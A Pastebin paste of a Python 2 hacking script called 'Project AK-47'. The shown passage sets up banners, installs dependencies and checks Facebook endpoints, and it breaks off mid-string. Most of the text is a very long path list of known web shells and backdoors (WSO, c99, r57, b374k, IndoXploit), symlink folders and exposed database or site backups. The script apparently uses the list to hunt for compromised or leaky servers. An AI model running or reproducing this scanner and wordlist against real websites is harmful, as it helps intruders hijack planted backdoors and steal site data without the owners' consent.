R3DB0T

AK-47 nasirxo

Sep 24th, 2019
754
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 95.41 KB | None | 0 0
  1. import os, sys, base64, random, hashlib, time, json, re
  2. from multiprocessing.pool import ThreadPool
  3. from multiprocessing import *
  4. W = '\x1b[1;37m'
  5. N = '\x1b[0m'
  6. R = '\x1b[1;37m\x1b[31m'
  7. B = '\x1b[1;37m\x1b[34m'
  8. G = '\x1b[1;32m'
  9. Y = '\x1b[1;33;40m'
  10. SR = W + '[' + R + '*' + W + ']'
  11. SG = W + '[' + G + '*' + W + ']'
  12. SRO = W + '(' + R + '>' + W + ')'
  13. SGO = W + '(' + G + '>' + W + ')'
  14. xin = '\n'
  15. SBG = '\x1b[1;37m(\x1b[1;32m\xe2\x97\x8f\x1b[1;37m)'
  16. SBR = '\x1b[1;37m(\x1b[1;37m\x1b[31m\xe2\x97\x8f\x1b[1;37m)'
  17. bannerm = [
  18.  ('\n   {}      ,{}\n         \\ , , /\n         (\xd2\x82{}\xc2\xb0{}_{}\xc2\xb0{}){}      Project AK-47\n   {}         <,,{}\xef\xb8\xbb\xe2\x95\xa6\xe2\x95\xa4\xe2\x94\x80 {}\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb{}\xc2\xbb \xd2\x89 {}\n         _/\xef\xb9\x8b\\___\n').format(G, W, G, W, G, W, W, W, R, Y, R, W)]
  19. banner = [
  20.  ('\n   {}      ,{}      Inspired from ASU By Deray\n         \\ , , /\n         (\xd2\x82{}\xc2\xb0{}_{}\xc2\xb0{}){}     Project-AK-47\n   {}      <,,{}\xef\xb8\xbb\xe2\x95\xa6\xe2\x95\xa4\xe2\x94\x80 {}\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb\xc2\xbb{}\xc2\xbb \xd2\x89 {}  V1.0{}\n         _/\xef\xb9\x8b\\___  Dev : Nasir Ali\n').format(G, W, G, W, G, W, W, W, R, Y, R, G, W)]
  21. procx = ThreadPool(int(cpu_count()) * 5)
  22. os.system('clear')
  23.  
  24. def funx(word):
  25.     lix = [
  26.      '/', '-', '|']
  27.     for i in range(5):
  28.         for x in range(len(lix)):
  29.             sys.stdout.write(('\r{}.. {}').format(str(word), lix[x]))
  30.             time.sleep(0.3)
  31.             sys.stdout.flush()
  32.  
  33.  
  34. if int(sys.version[0]) != 2:
  35.     sys.stdout.write("It's Python2 Script \n use python2 ")
  36.     sys.exit()
  37. try:
  38.     from requests import *
  39.     from bs4 import *
  40.     import requests
  41.     print xin + SGO + G + ' Requirements Available'
  42. except:
  43.     print xin + SRO + R + 'Installing Requirements......'
  44.     os.system('pip2 install requests')
  45.     os.system('pip2 install bs4')
  46.     from requests import *
  47.     from bs4 import *
  48.     import requests
  49.     os.system('clear')
  50. else:
  51.     s = Session()
  52.     headers = {'Accept-Language': 'en-US,en;q=0.5'}
  53.     url = 'https://free.facebook.com{}'
  54.     funx(SG + Y + ' Checking For Free-Facebook Support')
  55.     try:
  56.         if get('https://free.facebook.com', allow_redirects=False).status_code != 200:
  57.             print xin + SR + R + ' Free Facebook Not Supported:('
  58.             url = 'https://mbasic.facebook.com{}'
  59.         else:
  60.             print xin + SG + G + ' Free Facebook Mode Available :)'
  61.     except:
  62.         print xin + SR + R + ' No Internet Connection:('
  63.         sys.exit()
  64.  
  65.     shellp = '/wso.php\n/wso-2.5.php\n/deray.txt\n/wos.php?login=wos\n/1945.php?login=1945\n/wos.php\n/1945.php\n/45.php\n/cc.php\n/ls.php\n/system.php\n/cmd.php\n/rootx.php\n/adminer.php\n/jkt48_1.php\n/indonesia.php\n/php.php\n/b374k.php\n/1n73ction.php\n/shell.php\n/sh3ll.php\n/root.php\n/bh.php\n/sbh.php\n/idca.php\n/indoxploit.php\n/indoxploit_shell.php\n/idca_shell.php\n/bejak.php\n/injection.php\n/gaza.php\n/andela.php\n/jkt48.php\n/backdoor.php\n/backd00r.php\n/1337.php\n/komet.php\n/bekdur.php\n/bd.php\n/arab.php\n/xxx.php\n/c99.php\n/r57.php\n/webadmin.php\n/data.php\n/konten.php\n/kamu.php\n/iya.php\n/koe.php\n/gca.php\n/sj.php\n/shell.asp\n/R57.php\n/C99.php\n/inject.php\n/kdoor.php\n/index.php\n/o.php\n/mosok.php\n/v.php\n/i.php\n/a.php\n/s.php\n/ap.php\n/you.php\n/1.php\n/2.php\n/3.php\n/4.php\n/5.php\n/6.php\n/7.php\n/8.php\n/9.php\n/10.php\nb.php\nr.php\ns.php\nu.php\ny.php\nk.php\nl.php\ni.php\no.php\nm.php\nj.php\nc.php\nz.php\nq.php\ne.php\nw.php\nt.php\nr.php\nf.php\nd.php\nok.php\n1.php\n2.php\n3.php\n4.php\n5.php\n7.php\n6.php\n8.php\n9.php\n0.php\n00.php\nherp.php\nnptice.php\ntuyul.php\nnikung.php\ntertykung.php\ncodrs.php\njingan.php\nchan.php\nkntl.php\nlosX.php\nmom.php\nsad.php\nuploads/ok.php\nupload/ok.php\nupload/up.php\nupload/shell.php\nupload/idx.php\nupload/ind.php\nupload/v.php\nupload/sym.php\nupload/gallers.php\nupload/bekdur.php\nupload/file/up.php\nupload/file/wso.php\nupload/file/test.php\nupload/file/WSO.php\nupload/file/123.php\nupload/file/uploader.php\nupload/file/upload.php\nupload/file/zero.php\nupload/file/ups.php\nupload/file/tmp.php\nupload/file/jump.php\nupload/file/x.php\nupload/file/X.php\nupload/file/idx.php\nupload/file/b3ca7k.php\nupload/file/indo.php\nupload/file/asu.php\nupload/file/dhanush.php\nupload/file/aaa.php\nupload/file/az.php\nupload/file/xxx.php\nupload/file/curl.php\nupload/file/root.php\nupload/file/asu.php\nupload/file/id.php\nupload/file/minishell.php\nupload/file/kill.php\nupload/file/0.php\nupload/file/alone.php\nupload/file/hex.php\nupload/file/500.php\nupload/file/error.php\nupload/file/406.php\nupload/file/fuck.php\nupload/file/zzz.php\nimages/WSO.php\nimages/dz.php\nimages/DZ.php\nimages/cpanel.php\nimages/cpn.php\nimages/sos.php\nimages/term.php\nimages/Sec-War.php\nimages/sql.php\nimages/ssl.php\nimages/mysql.php\nimages/WolF.php\nimages/madspot.php\nimages/Cgishell.pl\nimages/killer.php\nimages/changeall.php\nimages/2.php\nimages/Sh3ll.php\nimages/dz0.php\nimages/dam.php\nimages/user.php\nimages/dom.php\nimages/whmcs.php\nimages/vb.zip\nimages/sa.php\nimages/sysadmins/\nimages/admin1/\nimages/sniper.php\nimages/images/Sym.php\nimages//r57.php\nimages/gzaa_spysl\nimages/sql-new.php\nimages/shell.php\nimages/sa.php\nimages/admin.php\nimages/sa2.php\nimages/2.php\nimages/user.txt\nimages/site.txt\nimages/error_log\nimages/error\nimages/site.sql\nimages/vb.sql\nimages/forum.sql\nimages/r00t-s3c.php\nimages/c.php\nimages/backup.sql\nimages/back.sql\nimages/data.sql\nimages/tmp/vaga.php\nimages/tmp/killer.php\nimages/whmcs.php\nimages/abuhlail.php\nimages/tmp/killer.php\nimages/tmp/domaine.pl\nimages/tmp/domaine.php\nimages/useradmin/\nimages/tmp/d0maine.php\nimages/d0maine.php\nimages/tmp/sql.php\nimages/X.php\nimages/123.php\nimages/m.php\nimages/b.php\nimages/up.php\nimages/tmp/dz1.php\nimages/dz1.php\nimages/Symlink.php\nimages/Symlink.pl\nimages/joomla.zip\nimages/wp.php\nimages/buck.sql\nincludes/WSO.php\nincludes/dz.php\nincludes/DZ.php\nincludes/cpanel.php\nincludes/cpn.php\nincludes/sos.php\nincludes/term.php\nincludes/Sec-War.php\nincludes/sql.php\nincludes/ssl.php\nincludes/mysql.php\nincludes/WolF.php\nincludes/madspot.php\nincludes/Cgishell.pl\nincludes/killer.php\nincludes/changeall.php\nincludes/2.php\nincludes/Sh3ll.php\nincludes/dz0.php\nincludes/dam.php\nincludes/user.php\nincludes/dom.php\nincludes/whmcs.php\nincludes/vb.zip\nincludes/r00t.php\nincludes/c99.php\nincludes/gaza.php\nincludes/1.php\nincludes/d0mains.php\nincludes/madspotshell.php\nincludes/info.php\nincludes/egyshell.php\nincludes/Sym.php\nincludes/c22.php\nincludes/c100.php\nincludes/configuration.php\nincludes/g.php\nincludes/xx.pl\nincludes/ls.php\nincludes/Cpanel.php\nincludes/k.php\nincludes/zone-h.php\nincludes/tmp/user.php\nincludes/tmp/Sym.php\nincludes/cp.php\nincludes/tmp/madspotshell.php\nincludes/tmp/root.php\nincludes/tmp/whmcs.php\nincludes/tmp/index.php\nincludes/tmp/2.php\nincludes/tmp/dz.php\nincludes/tmp/cpn.php\nincludes/tmp/changeall.php\nincludes/tmp/Cgishell.pl\nincludes/tmp/sql.php\nincludes/0day.php\nincludes/tmp/admin.php\nincludes/L3b.php\nincludes/d.php\nincludes/tmp/d.php\nincludes/tmp/L3b.php\nincludes/sado.php\nincludes/admin1.php\nincludes/upload.php\nincludes/up.php\nincludes/vb.zip\nincludes/vb.rar\nincludes/admin2.asp\nincludes/uploads.php\nincludes/sa.php\nincludes/sysadmins/\nincludes/admin1/\nincludes/sniper.php\nincludes/images/Sym.php\nincludes//r57.php\nincludes/gzaa_spysl\nincludes/sql-new.php\nincludes//shell.php\nincludes//sa.php\nincludes//admin.php\nincludes//sa2.php\nincludes//2.php\nincludes//gaza.php\nincludes//up.php\nincludes//upload.php\nincludes//uploads.php\nincludes/shell.php\nincludes//amad.php\nincludes//t00.php\nincludes//dz.php\nincludes//site.rar\nincludes//Black.php\nincludes//site.tar.gz\nincludes//home.zip\nincludes//home.rar\nincludes//home.tar\nincludes//home.tar.gz\nincludes//forum.zip\nincludes//forum.rar\nincludes//forum.tar\nincludes//forum.tar.gz\nincludes//test.txt\nincludes//ftp.txt\nincludes//user.txt\nincludes//site.txt\nincludes//error_log\nincludes//error\nincludes//cpanel\nincludes//awstats\nincludes//site.sql\nincludes//vb.sql\nincludes//forum.sql\nincludes/r00t-s3c.php\nincludes/c.php\nincludes//backup.sql\nincludes//back.sql\nincludes//data.sql\nincludes/wp.rar/\nincludes/asp.aspx\nincludes/tmp/vaga.php\nincludes/tmp/killer.php\nincludes/whmcs.php\nincludes/abuhlail.php\nincludes/tmp/killer.php\nincludes/tmp/domaine.pl\nincludes/tmp/domaine.php\nincludes/useradmin/\nincludes/tmp/d0maine.php\nincludes/d0maine.php\nincludes/tmp/sql.php\nincludes/X.php\nincludes/123.php\nincludes/m.php\nincludes/b.php\nincludes/up.php\nincludes/tmp/dz1.php\nincludes/dz1.php\nincludes/forum.zip\nincludes/Symlink.php\nincludes/Symlink.pl\nincludes/joomla.zip\nincludes/joomla.rar\nincludes/wp.php\nincludes/buck.sql\nincludes/sysadmin.php\nincludes/images/c99.php\nincludes/xd.php\nincludes/c100.php\nincludes/spy.aspx\nincludes/xd.php\nincludes/tmp/xd.php\nincludes/sym/root/home/\nincludes/billing/killer.php\nincludes/tmp/upload.php\nincludes/tmp/admin.php\nincludes/Server.php\nincludes/tmp/uploads.php\nincludes/tmp/up.php\nincludes/Server/\nincludes/wp-admin/c99.php\nincludes/tmp/priv8.php\nincludes/priv8.php\nincludes/cgi.pl/\nincludes/tmp/cgi.pl\nincludes/downloads/dom.php\nincludes/webadmin.html\nincludes/admins.php\nincludes/bluff.php\nincludes/king.jeen\nincludes/admins/\nincludes/admins.asp\nincludes/admins.php\nincludes/wp.zip\nincludes/\nupload.php\nadmin/upload.php\nshell.php\nup.php\nuploader.php\na.php\n123.php\ntest.php\nminishell.php\n0.php\nwso.php\nerror_log\ntools.php\nr00t.php\nadmin/error_log\naccess_log\nphpinfo.php\ninfo.php\nxxx.php\nindo.php\nidx.php\nsym.py\ndir/\nlib/\ntmp/\nincludes/\nlog/error_log\nlog/error.log\nlog/www-error.log\ninclude/\nScripts/\ntest/\nsym/root/home/\nchonx_sym/\nchonx_root/\nweb/\nupload/\nimages/\nimg/\ninc/\njs/\nphp/\nsymlink/\nsym/\nidx_config/\nconfig/\nLog/\ncox_config/\nsym_config/\nnoname_config/\nidx_symconf/\nsymconf/\nroot/\nfile/\nfiles/\nconfig.txt\nasu.php\nindex.php\nindex.php/?login\ndb.php\nREADME.txt\ninclude/config.php\nconfig.php\nlogs\nindoxploit.php\nindex1.php\nindex.html\nsh3ll.php\nup.html\nscript.php\nfuck.php\ndir.php\n406.php\n403.php\n500.php\naccounts.php\nbekdur.php\nnotfound.php\nnot_acceptable.php\n1337.php\n1n73ct10n.php\nb374k.php\nadmin_home.php\nhome_admin.php\nshell.php\nzeeb.php\ndz.php\nxd.php\nimages/up.php\nimages/upload.php\nfiles/up.php\nfile/upload.php\nfiles/shell.php\nfiles/uploader.php\nfiles/indexx.php\nfile/up.php\nfile/uplod.php\nfile/wso.php\nfile/idx.php\nfile/up1.php\n13.php\nkiller.php\nSh3ll.php\nnew.php\nSym.php\ndom.php\nzero.php\npriv8.php\njembut.php\nv4ga.php\nbackup.zip\ns3c.php\nmadspotshell.php\nsa.php\nx.php\nnoname.php\nkntol.php\nWSO.php\nIndoXploit.php\nbajingan.php\nc99.php\nX.php\nGood.php\npas.phtml\npas.php\nabc.php\nindexx.php\nbrowse.php\nup1.php\nhaha.php\nz.php\ngaza.php\nsc.php\n1234.php\nfvck.php\nerror.php\n0x.php\nup.php5\nshell.php5\ninc/config.php\nix.php\n-.php\nid.php\nr0x.php\nbn.php\ndm.php\ngator.php\nmail.php\nmailer.php\nperlcgi.pl\nphp.ini\nmodul.php\nwso1.php\nwp.php\nconfiguration.php\nc.php\ntai.php\nroot.php\nwww.php\nx13.php\nntaps.php\ntools.php\nzip.php\n@.php\nea.php\naaaa.php\ncinfo.php\nby.php\nceleng.php\njmbt.php\nnewfile.php\nmaho.php\nmia.php\npro.php\nqwe.php\nshell_finder.php\n11.php\ncfinder.php\ntitle.php\nedit.php\ns.php\nwp.zip\nxmlrpc.php\npasired.php\npass.php\nadm.php\nadminer.php\nCpanel.php\ncpanel.php\nnoob.php\n..php\nb2.php\nlol.php\nLol.php\ndhanush.php\nasw.php\nmini.php5\nler.php\ndef.php\nex.php\nnoname.php\nunknown.php\nanon.php\nsel.php\nextremecrw.php\nindx.php\n14.php\n6.php\nangel.php\nbv7binary.php\nc100.php\nr57.php\nwebroot.php\nh4cker.php\ngazashell.php\nlocus7shell.php\nsyrianshell.php\ninjection.php\ncyberwarrior.php\nernebypass.php\ng6shell.php\npouyaserver.php\nsaudishell.php\nsimattacker.php\nsosyeteshell.php\ntryagshell.php\nuploadshell.php\nwsoshell.php\nzehir4shell.php\nlostdcshell.php\ncommandshell.php\nmailershell.php\ncwshell.php\niranshell.php\nindishell.php\ng6sshell.php\nsqlshell.php\nsimshell.php\ntryagshell.php\nzehirshell.php\nk2ll33d.php\nb1n4ry.php\n12.php\ndefault.php\nblank.php\n/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;tableid=1echercher\n/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1\n/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php\n/wp-content/plugins/disqus-comment-system/disqus.php\n/d0mains.php\n/wp-content/plugins/akismet/akismet.php\n/madspotshell.php\n/info.php\n/egyshell.php\n/Sym.php\n/c22.php\n/c100.php\n/wp-content/plugins/akismet/admin.php\n/configuration.php\n/g.php\n/wp-content/plugins/google-sitemap-generator/sitemap-core.php\n/wp-content/plugins/akismet/widget.php\n/xx.pl\n/ls.php\n/Cpanel.php\n/k.php\n/zone-h.php\n/tmp/user.php\n/tmp/Sym.php\n/cp.php\n/tmp/madspotshell.php\n/tmp/root.php\n/tmp/whmcs.php\n/tmp/index.php\n/tmp/2.php\n/tmp/dz.php\n/tmp/cpn.php\n/tmp/changeall.php\n/tmp/Cgishell.pl\n/tmp/sql.php\n/0day.php\n/tmp/admin.php\n/cliente/downloads/h4xor.php\n/whmcs/downloads/dz.php\n/L3b.php\n/d.php\n/tmp/d.php\n/tmp/L3b.php\n/wp-content/plugins/akismet/admin.php\n/templates/rhuk_milkyway/index.php\n/templates/beez/index.php\n/sado.php\n/admin1.php\n/upload.php\n/up.php\n/vb.zip\n/vb.rar\n/admin2.asp\n/uploads.php\n/sa.php\n/sysadmins/\n/admin1/\n/sniper.php\n/administration/Sym.php\nimages/Sym.php\n/r57.php\n/wp-content/plugins/disqus-comment-system/disqus.php\ngzaa_spysl\nsql-new.php\n/shell.php\n/sa.php\n/admin.php\n/sa2.php\n/2.php\n/gaza.php\n/up.php\n/upload.php\n/uploads.php\n/templates/beez/index.php\nshell.php\n/amad.php\n/t00.php\n/dz.php\n/site.rar\n/Black.php\n/site.tar.gz\n/home.zip\n/home.rar\n/home.tar\n/home.tar.gz\n/forum.zip\n/forum.rar\n/forum.tar\n/forum.tar.gz\n/test.txt\n/ftp.txt\n/user.txt\n/site.txt\n/error_log\n/error\n/cpanel\n/awstats\n/site.sql\n/vb.sql\n/forum.sql\nr00t-s3c.php\nc.php\n/backup.sql\n/back.sql\n/data.sql\nwp.rar/\nwp-content/plugins/disqus-comment-system/disqus.php\nasp.aspx\n/templates/beez/index.php\n/tmp/vaga.php\n/tmp/killer.php\n/whmcs.php\nabuhlail.php\n/tmp/killer.php\n/tmp/domaine.pl\n/tmp/domaine.php\n/useradmin/\n/tmp/d0maine.php\n/d0maine.php\n/tmp/sql.php\n/X.php\n/123.php\n/m.php\n/b.php\n/up.php\n/tmp/dz1.php\n/dz1.php\n/forum.zip\n/Symlink.php\n/Symlink.pl\n/forum.rar\n/joomla.zip\n/joomla.rar\n/wp.php\n/buck.sql\n/sysadmin.php\n/images/c99.php\n/xd.php\n/c100.php\n/spy.aspx\n/xd.php\n/tmp/xd.php\n/sym/root/home/\n/billing/killer.php\n/tmp/upload.php\n/tmp/admin.php\n/Server.php\n/tmp/uploads.php\n/tmp/up.php\n/Server/\n/wp-admin/c99.php\n/tmp/priv8.php\npriv8.php\ncgi.pl/\n/tmp/cgi.pl\n/downloads/dom.php\n/templates/ja-helio-farsi/index.php\n/webadmin.html\n/admins.php\n/wp-content/plugins/count-per-day/js/yc/d00.php\n/bluff.php\n/king.jeen\n/admins/\n/admins.asp\n/admins.php\n/templates/beez/dz.php\n/templates/beez/DZ.php\n/templates/beez/cpn.php\n/templates/beez/sos.php\n/templates/beez/term.php\n/templates/beez/Sec-War.php\n/templates/beez/sql.php\n/templates/beez/ssl.php\n/templates/beez/mysql.php\n/templates/beez/WolF.php\n/templates/beez/configuration.php\n/templates/beez/g.php\n/templates/beez/xx.pl\n/templates/beez/ls.php\n/templates/beez/Cpanel.php\n/templates/beez/k.php\n/templates/beez/zone-h.php\n/templates/beez/tmp/user.php\n/templates/beez/tmp/Sym.php\n/templates/beez/cp.php\n/templates/beez/tmp/madspotshell.php\n/templates/beez/tmp/root.php\n/templates/beez/tmp/whmcs.php\n/templates/beez/tmp/index.php\n/templates/beez/tmp/2.php\n/templates/beez/tmp/dz.php\n/templates/beez/tmp/cpn.php\n/templates/beez/tmp/changeall.php\n/templates/beez/tmp/Cgishell.pl\n/templates/beez/tmp/sql.php\n/templates/beez/0day.php\n/templates/beez/tmp/admin.php\n/templates/beez/L3b.php\n/templates/beez/d.php\n/templates/beez/tmp/d.php\n/templates/beez/tmp/L3b.php\n/templates/beez/sado.php\n/templates/beez/admin1.php\n/templates/beez/upload.php\n/templates/beez/up.php\n/templates/beez/vb.zip\n/templates/beez/vb.rar\n/templates/beez/admin2.asp\n/templates/beez/uploads.php\n/templates/beez/sa.php\n/templates/beez/sysadmins/\n/templates/beez/admin1/\n/templates/beez/sniper.php\n/templates/beez/images/Sym.php\n/templates/beez//r57.php\n/templates/beez/gzaa_spysl\n/templates/beez/sql-new.php\n/templates/beez//shell.php\n/templates/beez//sa.php\n/templates/beez//admin.php\n/templates/beez//sa2.php\n/templates/beez//2.php\n/templates/beez//gaza.php\n/templates/beez//up.php\n/templates/beez//upload.php\n/templates/beez//uploads.php\n/templates/beez/shell.php\n/templates/beez//amad.php\n/templates/beez//t00.php\n/templates/beez//dz.php\n/templates/beez//site.rar\n/templates/beez//Black.php\n/templates/beez//site.tar.gz\n/templates/beez//home.zip\n/templates/beez//home.rar\n/templates/beez//home.tar\n/templates/beez//home.tar.gz\n/templates/beez//forum.zip\n/templates/beez//forum.rar\n/templates/beez//forum.tar\n/templates/beez//forum.tar.gz\n/templates/beez//test.txt\n/templates/beez//ftp.txt\n/templates/beez//user.txt\n/templates/beez//site.txt\n/templates/beez//error_log\n/templates/beez//error\n/templates/beez//cpanel\n/templates/beez//awstats\n/templates/beez//site.sql\n/templates/beez//vb.sql\n/templates/beez//forum.sql\n/templates/beez/r00t-s3c.php\n/templates/beez/c.php\n/templates/beez//backup.sql\n/templates/beez//back.sql\n/templates/beez//data.sql\n/templates/beez/wp.rar/\n/templates/beez/asp.aspx\n/templates/beez/tmp/vaga.php\n/templates/beez/tmp/killer.php\n/templates/beez/whmcs.php\n/templates/beez/abuhlail.php\n/templates/beez/tmp/killer.php\n/templates/beez/tmp/domaine.pl\n/templates/beez/tmp/domaine.php\n/templates/beez/useradmin/\n/templates/beez/tmp/d0maine.php\n/templates/beez/d0maine.php\n/templates/beez/tmp/sql.php\n/templates/beez/X.php\n/templates/beez/123.php\n/templates/beez/m.php\n/templates/beez/b.php\n/templates/beez/up.php\n/templates/beez/tmp/dz1.php\n/templates/beez/dz1.php\n/templates/beez/forum.zip\n/templates/beez/Symlink.php\n/templates/beez/Symlink.pl\n/templates/beez/forum.rar\n/templates/beez/joomla.zip\n/templates/beez/joomla.rar\n/templates/beez/wp.php\n/templates/beez/buck.sql\n/templates/beez/sysadmin.php\n/templates/beez/images/c99.php\n/templates/beez/xd.php\n/templates/beez/c100.php\n/templates/beez/spy.aspx\n/templates/beez/xd.php\n/templates/beez/tmp/xd.php\n/templates/beez/sym/root/home/\n/templates/beez/billing/killer.php\n/templates/beez/tmp/upload.php\n/templates/beez/tmp/admin.php\n/templates/beez/Server.php\n/templates/beez/tmp/uploads.php\n/templates/beez/tmp/up.php\n/templates/beez/Server/\n/templates/beez/wp-admin/c99.php\n/templates/beez/tmp/priv8.php\n/templates/beez/priv8.php\n/templates/beez/cgi.pl/\n/templates/beez/tmp/cgi.pl\n/templates/beez/downloads/dom.php\n/templates/beez/webadmin.html\n/templates/beez/admins.php\n/templates/beez/bluff.php\n/templates/beez/king.jeen\n/templates/beez/admins/\n/templates/beez/admins.asp\n/templates/beez/admins.php\n/templates/beez/wp.zip\n/templates/beez/index.php\n/images/WSO.php\n/images/dz.php\n/images/DZ.php\n/images/cpanel.php\n/images/cpn.php\n/images/sos.php\n/images/term.php\n/images/Sec-War.php\n/images/sql.php\n/images/ssl.php\n/images/mysql.php\n/images/WolF.php\n/images/madspot.php\n/images/Cgishell.pl\n/images/killer.php\n/images/changeall.php\n/images/2.php\n/images/Sh3ll.php\n/images/dz0.php\n/images/dam.php\n/images/user.php\n/images/dom.php\n/images/whmcs.php\n/images/vb.zip\n/images/sa.php\n/images/sysadmins/\n/images/admin1/\n/images/sniper.php\n/images/images/Sym.php\n/images//r57.php\n/images/gzaa_spysl\n/images/sql-new.php\n/images//shell.php\n/images//sa.php\n/images//admin.php\n/images//sa2.php\n/images//2.php\n/images//user.txt\n/images//site.txt\n/images//error_log\n/images//error\n/images//cpanel\n/images//awstats\n/images//site.sql\n/images//vb.sql\n/images//forum.sql\n/images/r00t-s3c.php\n/images/c.php\n/images//backup.sql\n/images//back.sql\n/images//data.sql\n/images/wp.rar/\n/images/asp.aspx\n/images/tmp/vaga.php\n/images/tmp/killer.php\n/images/whmcs.php\n/images/abuhlail.php\n/images/tmp/killer.php\n/images/tmp/domaine.pl\n/images/tmp/domaine.php\n/images/useradmin/\n/images/tmp/d0maine.php\n/images/d0maine.php\n/images/tmp/sql.php\n/images/X.php\n/images/123.php\n/images/m.php\n/images/b.php\n/images/up.php\n/images/tmp/dz1.php\n/images/dz1.php\n/images/forum.zip\n/images/Symlink.php\n/images/Symlink.pl\n/images/forum.rar\n/images/joomla.zip\n/images/joomla.rar\n/images/wp.php\n/images/buck.sql\n/includes/WSO.php\n/includes/dz.php\n/includes/DZ.php\n/includes/cpanel.php\n/includes/cpn.php\n/includes/sos.php\n/includes/term.php\n/includes/Sec-War.php\n/includes/sql.php\n/includes/ssl.php\n/includes/mysql.php\n/includes/WolF.php\n/includes/madspot.php\n/includes/Cgishell.pl\n/includes/killer.php\n/includes/changeall.php\n/includes/2.php\n/includes/Sh3ll.php\n/includes/dz0.php\n/includes/dam.php\n/includes/user.php\n/includes/dom.php\n/includes/whmcs.php\n/includes/vb.zip\n/includes/r00t.php\n/includes/c99.php\n/includes/gaza.php\n/includes/1.php\n/includes/d0mains.php\n/includes/madspotshell.php\n/includes/info.php\n/includes/egyshell.php\n/includes/Sym.php\n/includes/c22.php\n/includes/c100.php\n/includes/configuration.php\n/includes/g.php\n/includes/xx.pl\n/includes/ls.php\n/includes/Cpanel.php\n/includes/k.php\n/includes/zone-h.php\n/includes/tmp/user.php\n/includes/tmp/Sym.php\n/includes/cp.php\n/includes/tmp/madspotshell.php\n/includes/tmp/root.php\n/includes/tmp/whmcs.php\n/includes/tmp/index.php\n/includes/tmp/2.php\n/includes/tmp/dz.php\n/includes/tmp/cpn.php\n/includes/tmp/changeall.php\n/includes/tmp/Cgishell.pl\n/includes/tmp/sql.php\n/includes/0day.php\n/includes/tmp/admin.php\n/includes/L3b.php\n/includes/d.php\n/includes/tmp/d.php\n/includes/tmp/L3b.php\n/includes/sado.php\n/includes/admin1.php\n/includes/upload.php\n/includes/up.php\n/includes/vb.zip\n/includes/vb.rar\n/includes/admin2.asp\n/includes/uploads.php\n/includes/sa.php\n/includes/sysadmins/\n/includes/admin1/\n/includes/sniper.php\n/includes/images/Sym.php\n/includes//r57.php\n/includes/gzaa_spysl\n/includes/sql-new.php\n/includes//shell.php\n/includes//sa.php\n/includes//admin.php\n/includes//sa2.php\n/includes//2.php\n/includes//gaza.php\n/includes//up.php\n/includes//upload.php\n/includes//uploads.php\n/includes/shell.php\n/includes//amad.php\n/includes//t00.php\n/includes//dz.php\n/includes//site.rar\n/includes//Black.php\n/includes//site.tar.gz\n/includes//home.zip\n/includes//home.rar\n/includes//home.tar\n/includes//home.tar.gz\n/includes//forum.zip\n/includes//forum.rar\n/includes//forum.tar\n/includes//forum.tar.gz\n/includes//test.txt\n/includes//ftp.txt\n/includes//user.txt\n/includes//site.txt\n/includes//error_log\n/includes//error\n/includes//cpanel\n/includes//awstats\n/includes//site.sql\n/includes//vb.sql\n/includes//forum.sql\n/includes/r00t-s3c.php\n/includes/c.php\n/includes//backup.sql\n/includes//back.sql\n/includes//data.sql\n/includes/wp.rar/\n/includes/asp.aspx\n/includes/tmp/vaga.php\n/includes/tmp/killer.php\n/includes/whmcs.php\n/includes/abuhlail.php\n/includes/tmp/killer.php\n/includes/tmp/domaine.pl\n/includes/tmp/domaine.php\n/includes/useradmin/\n/includes/tmp/d0maine.php\n/includes/d0maine.php\n/includes/tmp/sql.php\n/includes/X.php\n/includes/123.php\n/includes/m.php\n/includes/b.php\n/includes/up.php\n/includes/tmp/dz1.php\n/includes/dz1.php\n/includes/forum.zip\n/includes/Symlink.php\n/includes/Symlink.pl\n/includes/forum.rar\n/includes/joomla.zip\n/includes/joomla.rar\n/includes/wp.php\n/includes/buck.sql\n/includes/sysadmin.php\n/includes/images/c99.php\n/includes/xd.php\n/includes/c100.php\n/includes/spy.aspx\n/includes/xd.php\n/includes/tmp/xd.php\n/includes/sym/root/home/\n/includes/billing/killer.php\n/includes/tmp/upload.php\n/includes/tmp/admin.php\n/includes/Server.php\n/includes/tmp/uploads.php\n/includes/tmp/up.php\n/includes/Server/\n/includes/wp-admin/c99.php\n/includes/tmp/priv8.php\n/includes/priv8.php\n/includes/cgi.pl/\n/includes/tmp/cgi.pl\n/includes/downloads/dom.php\n/includes/webadmin.html\n/includes/admins.php\n/includes/bluff.php\n/includes/king.jeen\n/includes/admins/\n/includes/admins.asp\n/includes/admins.php\n/includes/wp.zip\n/includes/\n/templates/rhuk_milkyway/WSO.php\n/templates/rhuk_milkyway/dz.php\n/templates/rhuk_milkyway/DZ.php\n/templates/rhuk_milkyway/cpanel.php\n/templates/rhuk_milkyway/cpn.php\n/templates/rhuk_milkyway/sos.php\n/templates/rhuk_milkyway/term.php\n/templates/rhuk_milkyway/Sec-War.php\n/templates/rhuk_milkyway/sql.php\n/templates/rhuk_milkyway/ssl.php\n/templates/rhuk_milkyway/mysql.php\n/templates/rhuk_milkyway/WolF.php\n/templates/rhuk_milkyway/madspot.php\n/templates/rhuk_milkyway/Cgishell.pl\n/templates/rhuk_milkyway/killer.php\n/templates/rhuk_milkyway/changeall.php\n/templates/rhuk_milkyway/2.php\n/templates/rhuk_milkyway/Sh3ll.php\n/templates/rhuk_milkyway/dz0.php\n/templates/rhuk_milkyway/dam.php\n/templates/rhuk_milkyway/user.php\n/templates/rhuk_milkyway/dom.php\n/templates/rhuk_milkyway/whmcs.php\n/templates/rhuk_milkyway/vb.zip\n/templates/rhuk_milkyway/r00t.php\n/templates/rhuk_milkyway/c99.php\n/templates/rhuk_milkyway/gaza.php\n/templates/rhuk_milkyway/1.php\n/templates/rhuk_milkyway/d0mains.php\n/templates/rhuk_milkyway/madspotshell.php\n/templates/rhuk_milkyway/info.php\n/templates/rhuk_milkyway/egyshell.php\n/templates/rhuk_milkyway/Sym.php\n/templates/rhuk_milkyway/c22.php\n/templates/